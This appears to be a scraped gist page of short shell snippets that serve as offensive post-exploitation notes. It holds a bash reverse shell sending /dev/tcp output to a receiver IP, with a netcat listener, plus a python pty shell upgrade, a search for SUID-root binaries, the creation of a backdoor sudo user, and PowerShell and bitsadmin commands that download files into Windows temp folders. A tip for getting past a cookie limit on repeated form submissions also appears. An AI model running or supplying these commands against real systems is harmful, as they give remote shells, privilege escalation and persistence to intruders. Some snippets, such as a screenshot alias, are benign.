This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
So the story goes you want to “submit” (HTTP POST) the same thing to a web site a bunch of times and the only control the genius web designer put in your way was a cookie. | |
Here is how ya do it. | |
Start up your web browser | |
Navigate to the URL | |
Delete ALL cookies | |
Open a shell (Bash or whatever) | |
Start tcpdump |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
python -c 'import pty;pty.spawn("/bin/bash")' | |
#or | |
/bin/sh -i |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/bin/bash -i >& /dev/tcp/<ip.address.of.reciver>/6666 0>&1 | |
# then at receiver: | |
nc -l -n -v -p 6666 | |
# And wait for incoming bash shell |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
find / -user root -perm -4000 -print 2>/dev/null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ function /usr/bin/foo () { /usr/bin/echo "It works"; } | |
$ export -f /usr/bin/foo | |
$ /usr/bin/foo | |
It works |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
useradd -m hal9k2 -G sudo -s /bin/bash | |
passwd hal9k2 | |
#or manualy | |
sudo adduser hal9k2 sudo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#PowerShell (any version): | |
(New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "C:\Windows\Temp\archive.zip") | |
#PowerShell 4.0 & 5.0: | |
Invoke-WebRequest "https://example.com/archive.zip" -OutFile "C:\Windows\Temp\archive.zip" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#It'll create a screenshot of the selected area and save the file in your home dir. | |
$ alias ss='import ~/ss-$(date +%F_%H%M_%S).png' | |
$ ss | |
#to View | |
$ display ss-2017-09-13_0350_20.png |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bitsadmin /transfer mydownloadjob /download /priority normal http://example.com/filename.zip C:\Users\username\Downloads\filename.zip |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#That will copy an antire directory, including subdirectories, to the target. | |
#The /Y suppress the overwite prompt and just does it without asking. | |
xcopy /S /E /Y <from> <to> |
OlderNewer